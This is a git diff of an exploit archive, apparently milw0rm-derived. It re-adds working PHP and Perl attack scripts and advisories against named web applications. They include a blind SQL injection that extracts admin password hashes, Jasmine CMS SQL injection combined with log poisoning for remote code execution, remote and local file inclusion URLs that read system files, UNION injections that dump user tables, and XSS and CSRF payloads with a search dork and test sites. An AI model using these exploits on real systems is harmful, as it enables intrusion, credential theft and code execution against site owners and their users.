@@ -1,185 +1,185 @@ - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); -} -// argv -$host=$argv[1]; -$path=$argv[2]; -$f=$argv[3]; -$port=80; -$proxy=""; -for ($i=3; $i<$argc; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -// Data - -$data='-----------------------------7d61bcd1f033e -Content-Disposition: form-data; name="action"; - -register ------------------------------7d61bcd1f033e -Content-Disposition: form-data; name="login"; - -dj7xpl ------------------------------7d61bcd1f033e -Content-Disposition: form-data; name="passwd"; - -dj7xpl ------------------------------7d61bcd1f033e -Content-Disposition: form-data; name="passwd2"; - -dj7xpl ------------------------------7d61bcd1f033e -Content-Disposition: form-data; name="email"; - -dj7xpl\@yahoo.com ------------------------------7d61bcd1f033e -Content-Disposition: form-data; name="language"; - -".$f."%00 ------------------------------7d61bcd1f033e -Content-Disposition: form-data; name="submit"; - -New user signup ------------------------------7d61bcd1f033e-- -'; -// Send Data To Target ;) - -$packet ="POST ".$path."index.php? HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -sleep(1); - -// Print End Message -Print "Exploit succeeded... 
;)\r\n"; -print "Go To Target And Login By This\r\nuser : dj7xpl / pass : dj7xpl and see file in your browser\r\n"; - -?> - -# milw0rm.com [2007-06-17] + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); +} +// argv +$host=$argv[1]; +$path=$argv[2]; +$f=$argv[3]; +$port=80; +$proxy=""; +for ($i=3; $i<$argc; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +// Data + +$data='-----------------------------7d61bcd1f033e +Content-Disposition: form-data; name="action"; + +register +-----------------------------7d61bcd1f033e +Content-Disposition: form-data; name="login"; + +dj7xpl +-----------------------------7d61bcd1f033e +Content-Disposition: form-data; name="passwd"; + +dj7xpl +-----------------------------7d61bcd1f033e +Content-Disposition: form-data; name="passwd2"; + +dj7xpl +-----------------------------7d61bcd1f033e +Content-Disposition: form-data; name="email"; + +dj7xpl\@yahoo.com +-----------------------------7d61bcd1f033e +Content-Disposition: form-data; name="language"; + +".$f."%00 +-----------------------------7d61bcd1f033e +Content-Disposition: form-data; name="submit"; + +New user signup +-----------------------------7d61bcd1f033e-- +'; +// Send Data To Target ;) + +$packet ="POST ".$path."index.php? HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +sleep(1); + +// Print End Message +Print "Exploit succeeded... ;)\r\n"; +print "Go To Target And Login By This\r\nuser : dj7xpl / pass : dj7xpl and see file in your browser\r\n"; + +?> + +# milw0rm.com [2007-06-17] diff --git a/platforms/php/webapps/4078.php b/platforms/php/webapps/4078.php index cf6f25411..5a51c116d 100755 --- a/platforms/php/webapps/4078.php +++ b/platforms/php/webapps/4078.php 
@@ -1,170 +1,170 @@ -#!/usr/bin/php -q -d short_open_tag=on - -Thanks to rgod for the php code and Marty for the Love - -Special Thanks to all the guys of milw0rm IRC channel for theyr help - ------------------------------------------------------------------------- -"; -if ($argc<3) { -echo " -Usage: php ".$argv[0]." Host Path -Host: target server (ip/hostname) -Path: path of revbb - -Example: -php ".$argv[0]." localhost /solar/ -"; -die; -} -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); -} -/* -This plattform is quite old, but i know that some guys tooked it for making some -indipendent project.. 
they may have took this bug to, so i'll ceck as soon as i -finish my last exam.. - -Vuln Explanation: - -goto common.inc.php: - -function insert_history($l_id,$i_text) -{ - global $db_name; - if(empty($db_name)){ - $db_name = "None"; - } - dbn("insert into user_history VALUES ('$l_id','".time()."','$db_name','".mysql_escape_string($i_text)."','$_SERVER[REMOTE_ADDR]','$_SERVER[HTTP_USER_AGENT]')"); -} - -$_SERVER[HTTP_USER_AGENT] is obviously not parsed by mq, so we can perform our sql-injection attack; -Because the admin name is always the same (Admin)we will attack this username, also because there isn't any counting -of the login attempts.. - -WARNING: - -old version of mysql may not support subquerys, so the exploit wouldn't work. -to bypass this you can exploit the game sending an XSS into the log and praying that the admin -see it.. - -*/ -$host=$argv[1]; -$path=$argv[2]; - -$port=80; -$proxy=""; - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -$md5s[0]=0;//null -$md5s=array_merge($md5s,range(48,57)); //numbers -$md5s=array_merge($md5s,range(97,102));//a-f letters -#print_r(array_values($md5s)); - -$j=1;$password=""; -while (!strstr($password,chr(0))) -{ -for ($i=0; $i<=255; $i++) -{ -if (in_array($i,$md5s)) -{ -$starttime=time(); -$sql="FuckYOU'), (1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*"; -$packet ="POST ".$p."game_listing.php HTTP/1.0\r\n"; -$data="l_name=Admin"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="CLIENT-IP: 999.999.999.999'; echo '123\r\n";//spoof -$packet.="User-Agent: $sql\r\n"; -$packet.="Host: 
".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cache-Control: no-cache\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); - //debug - #die($html); - sendpacketii($packet); -if (eregi("The used SELECT statements have a different number of columns",$html)){echo $html; die("\nunknown query error...");} - $endtime=time(); - echo "endtime -> ".$endtime."\r\n"; - $difftime=$endtime - $starttime; - echo "difftime -> ".$difftime."\r\n"; - if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(1);break;} -} - if ($i==255) {die("Exploit failed...");} - } - $j++; -} -echo " - -$uname Hash is: $password"; - -# Coded With BH Fast Generator v0.1 -?> - -# milw0rm.com [2007-06-18] +#!/usr/bin/php -q -d short_open_tag=on + +Thanks to rgod for the php code and Marty for the Love + +Special Thanks to all the guys of milw0rm IRC channel for theyr help + +------------------------------------------------------------------------ +"; +if ($argc<3) { +echo " +Usage: php ".$argv[0]." Host Path +Host: target server (ip/hostname) +Path: path of revbb + +Example: +php ".$argv[0]." 
localhost /solar/ +"; +die; +} +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); +} +/* +This plattform is quite old, but i know that some guys tooked it for making some +indipendent project.. they may have took this bug to, so i'll ceck as soon as i +finish my last exam.. 
+ +Vuln Explanation: + +goto common.inc.php: + +function insert_history($l_id,$i_text) +{ + global $db_name; + if(empty($db_name)){ + $db_name = "None"; + } + dbn("insert into user_history VALUES ('$l_id','".time()."','$db_name','".mysql_escape_string($i_text)."','$_SERVER[REMOTE_ADDR]','$_SERVER[HTTP_USER_AGENT]')"); +} + +$_SERVER[HTTP_USER_AGENT] is obviously not parsed by mq, so we can perform our sql-injection attack; +Because the admin name is always the same (Admin)we will attack this username, also because there isn't any counting +of the login attempts.. + +WARNING: + +old version of mysql may not support subquerys, so the exploit wouldn't work. +to bypass this you can exploit the game sending an XSS into the log and praying that the admin +see it.. + +*/ +$host=$argv[1]; +$path=$argv[2]; + +$port=80; +$proxy=""; + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +$md5s[0]=0;//null +$md5s=array_merge($md5s,range(48,57)); //numbers +$md5s=array_merge($md5s,range(97,102));//a-f letters +#print_r(array_values($md5s)); + +$j=1;$password=""; +while (!strstr($password,chr(0))) +{ +for ($i=0; $i<=255; $i++) +{ +if (in_array($i,$md5s)) +{ +$starttime=time(); +$sql="FuckYOU'), (1,2,3,4,5,(SELECT IF ((ASCII(SUBSTRING(se_games.admin_pw,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*"; +$packet ="POST ".$p."game_listing.php HTTP/1.0\r\n"; +$data="l_name=Admin"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; +$packet.="Accept-Language: it\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="CLIENT-IP: 999.999.999.999'; echo '123\r\n";//spoof +$packet.="User-Agent: $sql\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: 
Close\r\n"; +$packet.="Cache-Control: no-cache\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); + //debug + #die($html); + sendpacketii($packet); +if (eregi("The used SELECT statements have a different number of columns",$html)){echo $html; die("\nunknown query error...");} + $endtime=time(); + echo "endtime -> ".$endtime."\r\n"; + $difftime=$endtime - $starttime; + echo "difftime -> ".$difftime."\r\n"; + if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(1);break;} +} + if ($i==255) {die("Exploit failed...");} + } + $j++; +} +echo " + +$uname Hash is: $password"; + +# Coded With BH Fast Generator v0.1 +?> + +# milw0rm.com [2007-06-18] diff --git a/platforms/php/webapps/4079.txt b/platforms/php/webapps/4079.txt index bbbe25aae..ba5ddb016 100755 --- a/platforms/php/webapps/4079.txt +++ b/platforms/php/webapps/4079.txt 
@@ -1,18 +1,18 @@ -======================================================= -MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities -======================================================= -Found By : Abo0od , abod@islam-attack.com -======================================================= -Homepage: http://www.hack-teach.org/cc -======================================================= -Script Site : http://www.ultrize.com/minibill/index.php?page=download -======================================================= -File: /crontab/run_billing.php <= $config['include_dir'] -======================================================== -Exploit: -site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt? -======================================================= -greets to : www.islam-attack.com -======================================================= - -# milw0rm.com [2007-06-18] +======================================================= +MiniBill 2007-04-09 (v1.2.5) Remote File include Vulnerabilities +======================================================= +Found By : Abo0od , abod@islam-attack.com +======================================================= +Homepage: http://www.hack-teach.org/cc +======================================================= +Script Site : http://www.ultrize.com/minibill/index.php?page=download +======================================================= +File: /crontab/run_billing.php <= $config['include_dir'] +======================================================== +Exploit: +site.com/crontab/run_billing.php?config[include_dir]=Evil-script.txt? +======================================================= +greets to : www.islam-attack.com +======================================================= + +# milw0rm.com [2007-06-18] diff --git a/platforms/php/webapps/4081.php b/platforms/php/webapps/4081.php index 16fedff10..fa6dc6788 100755 --- a/platforms/php/webapps/4081.php +++ b/platforms/php/webapps/4081.php 
@@ -1,225 +1,225 @@ -#!/usr/bin/php -q -d short_open_tag=on -'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -function head(){ - - print "-------------------------------------------------------------------------\r\n"; - print " Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit\r\n"; - print "-------------------------------------------------------------------------\r\n"; -} - -function footer(){ - - print "-------------------------------------------------------------------------\r\n"; - print " http://www.w4ck1ng.com\r\n"; - print " ...Silentz\r\n"; - print "-------------------------------------------------------------------------\r\n"; -} - - -if ($exploit==0){ - -head(); - -$code=""; -$packet="GET " . $p . $code . " HTTP/1.0\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; -$packet.="Host: " . $host . "\r\n"; -$packet.="Connection: close\r\n\r\n"; -sendpacketii($packet); - -$sql = "' UNION SELECT id,username,email,signature,avatar_path,joined,total_visits,status FROM user WHERE id = '1'/*"; - -$data="login_username=" . $sql; -$data.="&login_password="; -$data.="login=Login"; -$packet ="POST " . $path . 
"login.php HTTP/1.1\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); - -if (strstr($html,"302 Found")){} -else{print "[-] Exploit Failed...\r\n"; footer(); exit();} -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(" ",$temp[1]); -$cookie=$temp2[0]; - -$paths= array ( -"../../../../../var/log/httpd/access_log", -"../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../etc/httpd/logs/access_log", -"../../../../../etc/httpd/logs/access.log", -"../../../../../etc/httpd/logs/error_log", -"../../../../../etc/httpd/logs/error.log", -"../../../../../var/www/logs/access_log", -"../../../../../var/www/logs/access.log", -"../../../../../usr/local/apache/logs/access_log", -"../../../../../usr/local/apache/logs/access.log", -"../../../../../var/log/apache/access_log", -"../../../../../var/log/apache/access.log", -"../../../../../var/log/access_log", -"../../../../../var/www/logs/error_log", -"../../../../../var/www/logs/error.log", -"../../../../../usr/local/apache/logs/error_log", -"../../../../../usr/local/apache/logs/error.log", 
-"../../../../../var/log/apache/error_log", -"../../../../../var/log/apache/error.log", -"../../../../../var/log/access_log", -"../../../../../var/log/error_log" -); - -for ($i=0; $i<=count($paths)-1; $i++) -{ -$a=$i+2; - -$packet ="GET " . $path . "admin/plugin_manager.php?u=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n"; -$packet.="Host: " . $host . "\r\n"; -$packet.="Cookie: " . $cookie . "\r\n"; -$packet.="Connection: Close\r\n\r\n"; - -sendpacketii($packet); - -if (strstr($html,"w4ckw4ck")) - { - $temp=explode("w4ckw4ck",$html); - print $temp[1]; - footer(); exit; - } - } -} - -if($exploit==1){ - - $sql = "news.php?item=-999/**/UNION/**/SELECT/**/0,password,0,0,0,0,username/**/FROM/**/user/**/WHERE/**/id=1/*"; - $packet ="GET " . $path . $sql . " HTTP/1.1\r\n"; - $packet.="Host: " . $host . "\r\n"; - $packet.="User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; - $packet.="Connection: Close\r\n\r\n"; - sendpacketii($packet); - - $temp = explode("Posted by ",$html); - $temp2 = explode("at ",$temp[1]); - $username = $temp2[0]; - - $temp = explode("
    ",$html); - $temp2 = explode("",$html); + $temp2 = explode("(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi) - { - $user = $4; - print "\n [+] Admin user retrieved: $user\n"; - print "\n [~] Retrieving password for $user\n"; - getPass( ) - } - else { - print "\n [-] Unable to retrieve admin username\n"; - print "\n [~] Retrieving password\n"; - getPass( ) - } -} - -sub getPass( ) { - - $passres = $ua->get("http://$host/$pject"); - - $passCon = $passres->content; - - if ($passCon =~ /(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi) - { - $pass = $4; - print "\n [+] Admin password retrieved: $pass\n"; - &resolveHash($pass); - system("color 7"); - } - else { - print "\n [-] Unable to retrieve admin password\n"; - system("color 7"); - exit(0); - } -} - -sub resolveHash($) -{ - print "\n [~] Attempting to resolve hash\n"; - $hashget = LWP::UserAgent->new; #thx gdata - $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash - $hashans = $resp->content; - if ($hashans =~ m\width="35%">([ -_a-z0-9.*?&=;<>/""]{1,25})(.*)a href=\"(.*)\"(.*)>(.*)<\/a><\/td>/gmi) + { + $user = $4; + print "\n [+] Admin user retrieved: $user\n"; + print "\n [~] Retrieving password for $user\n"; + getPass( ) + } + else { + print "\n [-] Unable to retrieve admin username\n"; + print "\n [~] Retrieving password\n"; + getPass( ) + } +} + +sub getPass( ) { + + $passres = $ua->get("http://$host/$pject"); + + $passCon = $passres->content; + + if ($passCon =~ /(.*)a href=\"(.*)\"(.*)>([a-f0-9]{32})<\/a><\/td>/gmi) + { + $pass = $4; + print "\n [+] Admin password retrieved: $pass\n"; + &resolveHash($pass); + system("color 7"); + } + else { + print "\n [-] Unable to retrieve admin password\n"; + system("color 7"); + exit(0); + } +} + +sub resolveHash($) +{ + print "\n [~] Attempting to resolve hash\n"; + $hashget = LWP::UserAgent->new; #thx gdata + $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash 
+ $hashans = $resp->content; + if ($hashans =~ m\width="35%">([ -_a-z0-9.*?&=;<>/""]{1,25})
    XSS:

    -
     search only in topics
     search in topics and answers
    XSS:

    +
     search only in topics
     search in topics and answers
    + value : your name (corresponding to ID) + + And now edit the other settings change via web browser.After that,use this CSRF wisely. + +[+] Here is the HTML code : + + + + +
    $forum
    "; - ---------- - Exploit ---------- - -[+] http://[Target]/[jubb_path]/viewforum.php?forum= - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-20] +=============================================================== + JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities +=============================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 20 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : JaxUltraBB + VERSION : <= 2.0 + DOWNLOAD : http://downloads.sourceforge.net/jubb/ +##################################################### + +--- Local File Inclusion --- + +----------------------------------- + Vulnerable File [viewprofile.php] +----------------------------------- +@Line 8-9 + + 8: $userfile = file_get_contents("users/".$_GET['user'].".JaxSQL"); + 9: $onlinefile = file_get_contents("users/".$_GET['user']."online.JaxSQL"); + +-------------- + POC Exploits +-------------- + +[+] http://192.168.24.25/jubb/viewprofile.php?user=../../../../../../../../boot.ini%00 + + + This exploit will open boot.ini in system file: + +[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) +\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" 
/noexecute=optin /fastdetect + + You can change boot.ini to /etc/passwd%00 in linux OS. + + +--- Remote XSS Exploit --- + +--------------------------------- + Vulnerable File [viewforum.php] +--------------------------------- + +@Line + + 14: $forum = $_GET['forum']; + + 15: online_moved("Viewing ".$_GET['forum']); + + 17: $forumfile = fopen("topics/".$forum."topics.JaxSQL", "at"); + 18: $topicsfile = file_get_contents("topics/".$forum."topics.JaxSQL", "at"); + 19: echo "


    - + -... - -################################################# - -Example: - -http://[server]/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 - - -10. Local File Include vulnerabilities found in scripts: - -themes/blog/layouts/print.php -themes/default/layouts/print.php -themes/portfolio/layouts/print.php -themes/snazzy/layouts/print.php - -Code -**** -################################################# - -if(!isset($page_include)) { - if($page_ck['custom'] == '0') include("./pages/".$page."/default/content.php"); - else include("./pages/custom/".$page."/default/content.php"); -} else include("./themes/".$theme_dir."/templates/".$page_include); -include("./themes/".$theme_dir."/templates/footer.tpl"); - -################################################# - -Example: - -http://[server]/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00 -http://[server]/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00 -http://[server]/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 - - - -11. Local File Include vulnerabilities found in scripts: - -themes/blog/layouts/total.php -themes/default/layouts/total.php -themes/portfolio/layouts/total.php -themes/snazzy/layouts/total.php - -Code -**** -################################################# - - - - - +... + +################################################# + +Example: + +http://[server]/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 + + +10. 
Local File Include vulnerabilities found in scripts: + +themes/blog/layouts/print.php +themes/default/layouts/print.php +themes/portfolio/layouts/print.php +themes/snazzy/layouts/print.php + +Code +**** +################################################# + +if(!isset($page_include)) { + if($page_ck['custom'] == '0') include("./pages/".$page."/default/content.php"); + else include("./pages/custom/".$page."/default/content.php"); +} else include("./themes/".$theme_dir."/templates/".$page_include); +include("./themes/".$theme_dir."/templates/footer.tpl"); + +################################################# + +Example: + +http://[server]/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00 +http://[server]/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00 +http://[server]/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 + + + +11. Local File Include vulnerabilities found in scripts: + +themes/blog/layouts/total.php +themes/default/layouts/total.php +themes/portfolio/layouts/total.php +themes/snazzy/layouts/total.php + +Code +**** +################################################# + + + + + - value : your name (corresponding to ID) - - And now edit the other settings change via web browser.After that,use this CSRF wisely. - -[+] Here is the HTML code : - - - - -
    $forum
    "; + +--------- + Exploit +--------- + +[+] http://[Target]/[jubb_path]/viewforum.php?forum= + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-20] diff --git a/platforms/php/webapps/5878.txt b/platforms/php/webapps/5878.txt index 197aa8c6a..5cc7c43e0 100755 --- a/platforms/php/webapps/5878.txt +++ b/platforms/php/webapps/5878.txt 
@@ -1,19 +1,19 @@ -################################################## ####################### -# -# AUTHOR : TurkishWarriorr -# -# HOME : http://www.1923turk.org -# -################################################## ####################### -Dork : Powered by emuCMS - -exploit : index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users-- - -Test Sites - -http://www.emusoft.org/index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users-- -################################################## ######################## -www.1923turk.org -turkish-warriorr@hotmail.com - -# milw0rm.com [2008-06-20] +################################################## ####################### +# +# AUTHOR : TurkishWarriorr +# +# HOME : http://www.1923turk.org +# +################################################## ####################### +Dork : Powered by emuCMS + +exploit : index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users-- + +Test Sites + 